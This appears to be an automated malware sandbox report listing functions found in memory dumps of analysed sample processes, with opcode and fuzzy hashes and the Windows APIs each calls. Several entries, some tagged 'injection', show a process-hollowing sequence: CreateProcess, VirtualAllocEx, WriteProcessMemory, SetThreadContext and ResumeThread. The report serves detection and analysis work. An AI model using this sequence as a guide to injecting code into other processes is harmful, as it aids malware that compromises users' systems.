Instruction Fuzzy Hash: 92E0DF31D153678BC702EBB09C000EEB734AE82221B08866BC06136190EB346658C7A1

Function 00E16739 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4589521616.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e10000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7212f35ead8c44081de73bcf20c338b0f74c8f106588d7db1a47af682c75b7d
Instruction ID: b950b2b50e1b43456720efb59a344f5af8ea0f9f615e73173cf49f2060c01b84
Opcode Fuzzy Hash: d7212f35ead8c44081de73bcf20c338b0f74c8f106588d7db1a47af682c75b7d
Instruction Fuzzy Hash: 09E0C23000A3C28FC703E338E85449A3F3AEE8321871481DEE041CE56BDEB9494AC731

Function 00E128B0 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4589521616.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e10000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f664b6774e5976f0b5c8a5ed9c990a4602c81860b2442559126f2fc770ec3e0c
Instruction ID: 147ee78828227962921ec1eba055844c63657c25adc41008e53666b5b6430e1e
Opcode Fuzzy Hash: f664b6774e5976f0b5c8a5ed9c990a4602c81860b2442559126f2fc770ec3e0c
Instruction Fuzzy Hash: C1D01732E2126B968B00AAA5EC048EEB738EE96661B948626D52437140EB70665986A1

Function 00E18EF8 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4589521616.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e10000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
Instruction ID: 9de78327c6c54a7ee64da721456aff953afa2398067aea332e41624566417ae2
Opcode Fuzzy Hash: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
Instruction Fuzzy Hash: 0FC0123320C1282AA224104E7C40AE3AA8DC3C93B8B211137FA1CA3200AC429CC201A8

Function 00E1D6D4 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4589521616.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e10000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d97db1fd41b3db94c722e5e17058dca39de94e77d2c574b8a78b9da1092c43a8
Instruction ID: 75ecadd24686aa40b938f986b488e24e13b344d4ce4440e8d24d95ea847c268b
Opcode Fuzzy Hash: d97db1fd41b3db94c722e5e17058dca39de94e77d2c574b8a78b9da1092c43a8
Instruction Fuzzy Hash: AED04235E04109CBCB30EFA8E4944DCBBB1EB49321B20642AD925B3256D63564558F11

Function 00E1AFAD Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4589521616.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e10000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 99a0b0724e84e723cb29d074aaa988dc1673fd9e4977dd567f155ec3690994c5
Instruction ID: 2385f0064a6a24e8da0da479149b87abed92171f1816d547063d05a4bca3f442
Opcode Fuzzy Hash: 99a0b0724e84e723cb29d074aaa988dc1673fd9e4977dd567f155ec3690994c5
Instruction Fuzzy Hash: E1D0677BB00008DFCB149F99E8409DDF776FB98221B048116F925E7264C6319925DB60

Function 00E16748 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4589521616.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e10000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97ad690961e285177d67c401760eef79db8db7489165a1285941dee56dacb086
Instruction ID: 1d1bd7be9f11e81f12e109b0beaf49f8a399b1f5cce0c1a482becd4d7301fb11
Opcode Fuzzy Hash: 97ad690961e285177d67c401760eef79db8db7489165a1285941dee56dacb086
Instruction Fuzzy Hash: DFC0803410071BCFD601F775FC85559775EE6C0300740C554E10549B5DFF74998687A0

Non-executed Functions

Function 00E1F974 Relevance: .3, Instructions: 265COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4589521616.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e10000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4fd445d56948a1ae75707ddaccd4373c97214116d44e1e32c8a55e92ec7195f
Instruction ID: 4a5df8373734fb64013790845c9000cc3fbc9012a966c4fe6016e5eebde86fd9
Opcode Fuzzy Hash: e4fd445d56948a1ae75707ddaccd4373c97214116d44e1e32c8a55e92ec7195f
Instruction Fuzzy Hash: F7C1BF74E01219CFEB14DFA5D944B9DBBB2BF89300F2090A9D809AB365DB359E85CF50

Analysis Process: xRAvleeiuDbJ.exePID: 7088, Parent PID: 1064COMMON

Execution Graph

Execution Coverage:	10.8%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	140
Total number of Limit Nodes:	5

Executed Functions

Function 015ED8D0 Relevance: 6.1, APIs: 4, Instructions: 132
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 015ED95E
GetCurrentThread.KERNEL32 ref: 015ED99B
GetCurrentProcess.KERNEL32 ref: 015ED9D8
GetCurrentThreadId.KERNEL32 ref: 015EDA31

Memory Dump Source

Source File: 0000000B.00000002.2191897010.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_15e0000_xRAvleeiuDbJ.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 249849ae57a974acd9198a3e3063587e538f8b8ff363adf575c98b1cafe41290
Instruction ID: a4fa62196f7d1b2a94f5c37f2fc407f2b75c3d8216b228cdfe0e8f58f15d0212
Opcode Fuzzy Hash: 249849ae57a974acd9198a3e3063587e538f8b8ff363adf575c98b1cafe41290
Instruction Fuzzy Hash: C55148B0D002498FEB18CFAAD948BEEBFF5BF88314F20845AD419AB260D7755944CB65

Function 015ED8E0 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 015ED95E
GetCurrentThread.KERNEL32 ref: 015ED99B
GetCurrentProcess.KERNEL32 ref: 015ED9D8
GetCurrentThreadId.KERNEL32 ref: 015EDA31

Memory Dump Source

Source File: 0000000B.00000002.2191897010.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_15e0000_xRAvleeiuDbJ.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 5fd9043cb3aac89e1b9b844551a918a3536c56e7f4cd5368ce40daf0bdf9a094
Instruction ID: 59aaa12b3407b5c3a3dc313d635e278a9be2c7cd32efdb86d9edf7c7d80ce05b
Opcode Fuzzy Hash: 5fd9043cb3aac89e1b9b844551a918a3536c56e7f4cd5368ce40daf0bdf9a094
Instruction Fuzzy Hash: 8C5159B0D002498FDB58CFAAD548BEEBBF5BB88314F20845AD419A7350D7355984CB65

Function 07604135 Relevance: 1.7, APIs: 1, Instructions: 247
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07604376

Memory Dump Source

Source File: 0000000B.00000002.2202165904.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7600000_xRAvleeiuDbJ.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 21fe8c3bfcd68bf3d5cb2e024c490b73637b08f41c8d6996acf3e4da51ba28b3
Instruction ID: faa28d603e760f3481cb1efbb8855669472c6894644ca687bfc1d93c495248b1
Opcode Fuzzy Hash: 21fe8c3bfcd68bf3d5cb2e024c490b73637b08f41c8d6996acf3e4da51ba28b3
Instruction Fuzzy Hash: F7A16DB1D0025ADFDB24CFA8C8407DEBBB2FF49314F1585A9E909A7280DB749985CF91

Function 07604140 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07604376

Memory Dump Source

Source File: 0000000B.00000002.2202165904.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7600000_xRAvleeiuDbJ.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: d3e936389b46473efd80259d1a5b0527542de29a913773c4aaae09e266ddba64
Instruction ID: b6b4435388ca39c71eca579a17a0b6612ba757ab2a00d3de943dacc8dd3535ff
Opcode Fuzzy Hash: d3e936389b46473efd80259d1a5b0527542de29a913773c4aaae09e266ddba64
Instruction Fuzzy Hash: A9915CB1D0025ADFDB24CFA8C8407DEBBB2FF49314F1585A9E909A7280DB749985CF91

Function 015EB241 Relevance: 1.7, APIs: 1, Instructions: 198
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 015EB49E

Memory Dump Source

Source File: 0000000B.00000002.2191897010.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_15e0000_xRAvleeiuDbJ.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: d258c89b962def93af878cf84f15f4152acba887d5ed605bb0de8719867efbe8
Instruction ID: 42823aa083d7390bb1ba4cba17a3fd8f6a4f187ac0631f5f7edb2c0e7e73a5fe
Opcode Fuzzy Hash: d258c89b962def93af878cf84f15f4152acba887d5ed605bb0de8719867efbe8
Instruction Fuzzy Hash: AB814770A00B068FEB28DF69D44975ABBF2FF88204F10892ED446DBA54D775E845CF90

Function 015E5E1C Relevance: 1.6, APIs: 1, Instructions: 101
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 015E5ED9

Memory Dump Source

Source File: 0000000B.00000002.2191897010.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_15e0000_xRAvleeiuDbJ.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 28e7ae284d9816ccf5b352e6685eb29ad7a601ca59a27324bb707b2bd7fe1498
Instruction ID: e59955156f1fb14c199b7c38c2c391c0c285f8fbf728393b4a4be72ac8d4ad3e
Opcode Fuzzy Hash: 28e7ae284d9816ccf5b352e6685eb29ad7a601ca59a27324bb707b2bd7fe1498
Instruction Fuzzy Hash: 0741EFB5C0061DCBEB24CFAAC8446DEBBF5BF88314F2081AAD518AB251EB755946CF50

Function 015E4A3C Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 015E5ED9

Memory Dump Source

Source File: 0000000B.00000002.2191897010.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_15e0000_xRAvleeiuDbJ.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 4294f6887ecae8e87f74d41004d7c1c5ecde671c3e5254f9f581151fac68d382
Instruction ID: 658b5e3a600e6bba76a897519a86f1930cfa5c6fa7fbb58865b9c07d64bd8889
Opcode Fuzzy Hash: 4294f6887ecae8e87f74d41004d7c1c5ecde671c3e5254f9f581151fac68d382
Instruction Fuzzy Hash: 8741C0B5C0061DCBEB24CFA9C84479EBBF5BF48304F20809AD518AB255EB755946CF90

Function 07603EB0 Relevance: 1.6, APIs: 1, Instructions: 75
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07603F48

Memory Dump Source

Source File: 0000000B.00000002.2202165904.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7600000_xRAvleeiuDbJ.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: b054da01db43f4d3fad7f1165ba54f44a95d3414d8911ca2f6eecce0412515fe
Instruction ID: 6cb8f9e9be7b6299e02571438725b644203beef212093323c7a2f5ba246d865a
Opcode Fuzzy Hash: b054da01db43f4d3fad7f1165ba54f44a95d3414d8911ca2f6eecce0412515fe
Instruction Fuzzy Hash: 722126B19003199FDF10CFAAC981BDEBBF5FF48320F148429E919A7241C7789954DBA4

Function 07603D18 Relevance: 1.6, APIs: 1, Instructions: 70
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07603D9E

Memory Dump Source

Source File: 0000000B.00000002.2202165904.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7600000_xRAvleeiuDbJ.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: a525b248c726a0a1249df963f7a9706aa64ae689f1227f6439b58e6fc6755f21
Instruction ID: b21c64db4e1b9132be81e944bb3838ef70a8f5bae4aeaa64791ddec67ac5a97a
Opcode Fuzzy Hash: a525b248c726a0a1249df963f7a9706aa64ae689f1227f6439b58e6fc6755f21
Instruction Fuzzy Hash: 2B2148B19003099FDB10CFAAC4857EFBBF4EF88224F14842AD559A7381CB789545CFA4

Function 07603EB8 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07603F48

Memory Dump Source

Source File: 0000000B.00000002.2202165904.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7600000_xRAvleeiuDbJ.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: b3b673a724e6000546adb448c67e73bffe82778abdd2ca3762d48d30fc9b9b2b
Instruction ID: 94a994befd8d19c3068ec927582d594dcf00400772d0d4d56f8b597ce0bde435
Opcode Fuzzy Hash: b3b673a724e6000546adb448c67e73bffe82778abdd2ca3762d48d30fc9b9b2b
Instruction Fuzzy Hash: 012104B190035A9FDB10CFAAC981BDEBBF5FF48310F148429E919A7240D7799954CBA4

Function 07603FA1 Relevance: 1.6, APIs: 1, Instructions: 67
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07604028

Memory Dump Source

Source File: 0000000B.00000002.2202165904.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7600000_xRAvleeiuDbJ.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 00e5104c4c366ec7c68c0c6f65c00371932538d7d137f9dae1efd4de507107bd
Instruction ID: 0cf1f61714a4db6ba520a96f05ec1242840b57efba926fc755932d8e9c5fda1a
Opcode Fuzzy Hash: 00e5104c4c366ec7c68c0c6f65c00371932538d7d137f9dae1efd4de507107bd
Instruction Fuzzy Hash: B12139B18003599FDB10CFAAC880BEEBBF5FF48320F108429E919A7240CB799555CBA4

Function 015EDB20 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 015EDBAF

Memory Dump Source

Source File: 0000000B.00000002.2191897010.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_15e0000_xRAvleeiuDbJ.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 39b2a87dbec2f4a1b51b137a2aa1a6a5f4f48267f607f073dcf1cd38f4e09ef6
Instruction ID: 400e1eb92771bcf2643c94f174fb78649afb3a720956096725159e86db16a9c9
Opcode Fuzzy Hash: 39b2a87dbec2f4a1b51b137a2aa1a6a5f4f48267f607f073dcf1cd38f4e09ef6
Instruction Fuzzy Hash: 9121E4B5D00209AFDB10CFAAD984ADEBFF8FB48320F14841AE954A7350D374A954CFA5

Function 07603FA8 Relevance: 1.6, APIs: 1, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07604028

Memory Dump Source

Source File: 0000000B.00000002.2202165904.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7600000_xRAvleeiuDbJ.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: d5bd08a9948cca4114412f412b7f639334d44b492c54ee674c8adc034d0127c5
Instruction ID: 403fb626f978cd1b90ca19ffb3a0d3a68a702446da6440f6c849ea5a47db283c
Opcode Fuzzy Hash: d5bd08a9948cca4114412f412b7f639334d44b492c54ee674c8adc034d0127c5
Instruction Fuzzy Hash: D32139B18003599FDB10DFAAC881BDEFBF5FF48310F108429E519A7250DB799950CBA5

Function 07603D20 Relevance: 1.6, APIs: 1, Instructions: 63
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07603D9E

Memory Dump Source

Source File: 0000000B.00000002.2202165904.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7600000_xRAvleeiuDbJ.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: ff2acdd05a991e82d833fccc25fd9ba164bbe9b4f774920fa2bcdfcbb94637b9
Instruction ID: f6ff9def44aa46ac7f87667560e4141332f376cabd64aa84e933df1642b9f793
Opcode Fuzzy Hash: ff2acdd05a991e82d833fccc25fd9ba164bbe9b4f774920fa2bcdfcbb94637b9
Instruction Fuzzy Hash: 2F2137B19003098FDB14DFAAC4857EEBBF4EF88224F14842AD559A7380DB789944CBA5

Function 015EDB28 Relevance: 1.6, APIs: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 015EDBAF

Memory Dump Source

Source File: 0000000B.00000002.2191897010.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_15e0000_xRAvleeiuDbJ.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 6a710335a9b29b49c48e26f8ff7f77395309933a05ad271a63da7ea3d2816538
Instruction ID: f380250d0513104ac69e3cfbc11933f6a60e5ff1e46c1ad65d62fce1d5b24738
Opcode Fuzzy Hash: 6a710335a9b29b49c48e26f8ff7f77395309933a05ad271a63da7ea3d2816538
Instruction Fuzzy Hash: 3221E4B5D002099FDB10CF9AD984ADEBBF8FB48310F14841AE914A7350D374A954CFA5

Function 07603DF0 Relevance: 1.6, APIs: 1, Instructions: 60memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07603E66

Memory Dump Source

Source File: 0000000B.00000002.2202165904.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7600000_xRAvleeiuDbJ.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: ef01df75d13bad4ee39278f567a4d00f4dee41976fd1db28946105beac67e02a
Instruction ID: 0c3571fca7e473881c04c01e0cc50729da367b3677bd14259fabab6536455d95
Opcode Fuzzy Hash: ef01df75d13bad4ee39278f567a4d00f4dee41976fd1db28946105beac67e02a
Instruction Fuzzy Hash: E21189B28002099FDB10DFAAC844BEFBBF5EF88320F20841AE516A7250C7759554CFA0

Function 07603DF8 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07603E66

Memory Dump Source

Source File: 0000000B.00000002.2202165904.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7600000_xRAvleeiuDbJ.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 6268f58ed68f686ab71690a35308ef54056fe9831cef13cce4281023fb6c8655
Instruction ID: 3164c5ab9dd9f357ae43d843615f01e1aaf64ba0affecfb13a0cedc5366ac0e0
Opcode Fuzzy Hash: 6268f58ed68f686ab71690a35308ef54056fe9831cef13cce4281023fb6c8655
Instruction Fuzzy Hash: 2D1149728003499FDB10DFAAC845BDFBBF5EF88720F24841AE515A7250C7759550CFA5

Function 07603832 Relevance: 1.6, APIs: 1, Instructions: 53threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 0760389A

Memory Dump Source

Source File: 0000000B.00000002.2202165904.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7600000_xRAvleeiuDbJ.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 1c78dd9e4ff350d33d8f59962afbb5dbbaf90cbccafb5db566df843c0a9900b3
Instruction ID: b35e1ffe092e4f8c992979762c6d9fe0999a65bf0229b64b18f5445873438298
Opcode Fuzzy Hash: 1c78dd9e4ff350d33d8f59962afbb5dbbaf90cbccafb5db566df843c0a9900b3
Instruction Fuzzy Hash: E41146B19002498FEB10DFAAC4457EFFBF4EB88224F24841AD519A7240CB79A944CBA4

Function 07607638 Relevance: 1.6, APIs: 1, Instructions: 50windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 0760769D

Memory Dump Source

Source File: 0000000B.00000002.2202165904.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7600000_xRAvleeiuDbJ.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 02f9ffe7681c91ea4a39876eea329d5eb06318f9ec9fb4262ec22642b91b8d78
Instruction ID: fad706debc26f4eff5239f6c67e78a7b9a2472f2e93ea126c584937705e45fac
Opcode Fuzzy Hash: 02f9ffe7681c91ea4a39876eea329d5eb06318f9ec9fb4262ec22642b91b8d78
Instruction Fuzzy Hash: 7F11F5B58003499FDB10DF9AD544BDFBBF8EB48320F208419E959A7240C375A594CFA5

Function 07603838 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 0760389A

Memory Dump Source

Source File: 0000000B.00000002.2202165904.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7600000_xRAvleeiuDbJ.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: ba83b4918134bcb0dd81d634e79764acbbd5f12d71618ca649dd7a1da8bd604b
Instruction ID: 77d18af98a5dbff5a6a7b944e6430af19ec625dd8929b4cf95f687d51d646ef1
Opcode Fuzzy Hash: ba83b4918134bcb0dd81d634e79764acbbd5f12d71618ca649dd7a1da8bd604b
Instruction Fuzzy Hash: E91128B19003498FEB14DFAAC44579FFBF4EF88724F248419D519A7340CB75A544CB95

Function 07606EC0 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 0760769D

Memory Dump Source

Source File: 0000000B.00000002.2202165904.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7600000_xRAvleeiuDbJ.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 8601b216c6a52bdc30751911c895e3e344c0ffdf88d4d6c996415431220e3fa5
Instruction ID: da66cfcfe231ebe1db7dc5d900b7a6e810d14bf1f54f186795909af88cffe3c7
Opcode Fuzzy Hash: 8601b216c6a52bdc30751911c895e3e344c0ffdf88d4d6c996415431220e3fa5
Instruction Fuzzy Hash: C111E0B58002499FDB10DF9AC545BDFBBF8EB48320F10845AE919A7240C375A954CFA5

Function 015EB438 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 015EB49E

Memory Dump Source

Source File: 0000000B.00000002.2191897010.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_15e0000_xRAvleeiuDbJ.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 2421f3278f07e9c8a808f11203047be7a2f72b2b87c5d3fd2ed0a6124829b623
Instruction ID: 2a88086fccf4223a86152cbff6fc22ed29833114750839ffc07b14b2ce791e6a
Opcode Fuzzy Hash: 2421f3278f07e9c8a808f11203047be7a2f72b2b87c5d3fd2ed0a6124829b623
Instruction Fuzzy Hash: E41110B6C006498FDB14CF9AC444ADEFBF5EB88324F10841AD918A7310D379A545CFA1

Function 0121D4C4 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2190681931.000000000121D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0121D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_121d000_xRAvleeiuDbJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a5e95b397b477f1c8b4d61e658dfefc19ade41a4bd7d1b91b5f27f58f00e9809
Instruction ID: 16571afa09d2e8e5229d716248dc2804969b3d38d460695b77fe64d7ef604c32
Opcode Fuzzy Hash: a5e95b397b477f1c8b4d61e658dfefc19ade41a4bd7d1b91b5f27f58f00e9809
Instruction Fuzzy Hash: A5214571510208EFDB05DF58E9C8B26BFA1FB98318F20C56DE9090B25AC336D446CBA1

Function 0122D1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2190746140.000000000122D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0122D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_122d000_xRAvleeiuDbJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c44a50a24a791baca0bc3264946038cea808d362358bb24e3110fea4ef0b900
Instruction ID: 6deed0ddf684996c1a4a4556484f1e6b01a5c8feccae13500cd95c648b9840c1
Opcode Fuzzy Hash: 4c44a50a24a791baca0bc3264946038cea808d362358bb24e3110fea4ef0b900
Instruction Fuzzy Hash: F2212671514208FFDB05DF94D9C0B2ABBA5FB85324F20C66DE9094B293C37AD846CB61

Function 0122D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2190746140.000000000122D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0122D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_122d000_xRAvleeiuDbJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4fc983342430c6b6436b195c6a454edf3fd0ead0e79d103cee1caf6a965143f
Instruction ID: e23ebfcf994b2620725eb0a5367fb1a2d9c5889e6229db4d0fa5b05d4abf364d
Opcode Fuzzy Hash: e4fc983342430c6b6436b195c6a454edf3fd0ead0e79d103cee1caf6a965143f
Instruction Fuzzy Hash: FD213471614248EFDB15DF64D9C0B1ABB61FB84314F20C56DEA0A4B2A2C37FD547CA61

